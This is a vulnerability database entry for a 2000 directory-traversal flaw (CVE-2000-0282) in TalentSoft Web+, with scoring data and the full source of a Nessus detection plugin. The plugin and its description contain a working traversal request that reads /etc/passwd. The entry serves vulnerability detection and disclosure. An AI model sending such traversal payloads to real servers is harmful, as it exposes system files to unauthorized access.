Vulnerabilities > CVE-2000-0282 - Unspecified vulnerability in Talentsoft Web+ 4

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
talentsoft
nessus
exploit available

Summary

TalentSoft webpsvr daemon in the Web+ shopping cart application allows remote attackers to read arbitrary files via a .. (dot dot) attack on the webplus CGI program.

Vulnerable Configurations

Part Description Count
Application
Talentsoft
1

Exploit-Db

descriptionTalentSoft Web+ 4.x Directory Traversal Vulnerability. CVE-2000-0282. Remote exploit for cgi platform
idEDB-ID:19842
last seen2016-02-02
modified2000-04-12
published2000-04-12
reporterJohn P. McNeely
sourcehttps://www.exploit-db.com/download/19842/
titleTalentSoft Web+ 4.x - Directory Traversal Vulnerability

Nessus

NASL familyCGI abuses
NASL idWEBPLUS.NASL
descriptionThe
last seen2020-06-01
modified2020-06-02
plugin id10367
published2000-04-12
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10367
titleTalentSoft Web+ webplus CGI Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

include( 'compat.inc' );

if(description)
{
  script_id(10367);
  script_version ("1.32");
  script_cve_id("CVE-2000-0282");
  script_bugtraq_id(1102);

  script_name(english:"TalentSoft Web+ webplus CGI Traversal Arbitrary File Access");
  script_summary(english:"Checks if webplus reads any file");

  script_set_attribute(
    attribute:'synopsis',
    value:'The remote CGI is vulnerable to information disclosure.'
  );

  script_set_attribute(
    attribute:'description',
    value:"The 'webplus' CGI allows an attacker
to view any file on the target computer by requesting :

  GET /cgi-bin/webplus?script=/../../../../etc/passwd"
  );

  script_set_attribute(
    attribute:'solution',
    value: "Remove the 'webplus' CGI or upgrade to a 'webplus' build higher than version 512."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(
    attribute:'see_also',
    value:'https://seclists.org/bugtraq/2000/Apr/39'
  );

 script_set_attribute(attribute:"plugin_publication_date", value: "2000/04/12");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/04/12");
 script_cvs_date("Date: 2018/11/15 20:50:19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);

  script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
  script_family(english:"CGI abuses");
  script_dependencie("find_service1.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

foreach dir (cgi_dirs())
{
  req = string(dir, "/webplus?script=/../../../../etc/passwd");
  w = http_send_recv3(method:"GET", item:req, port:port);
  if (isnull(w)) exit(0);
  result = strcat(w[0], w[1], '\r\n', w[2]);
  if(egrep(pattern:".*root:.*:0:[01]:.*", string:result))security_warning(port);
}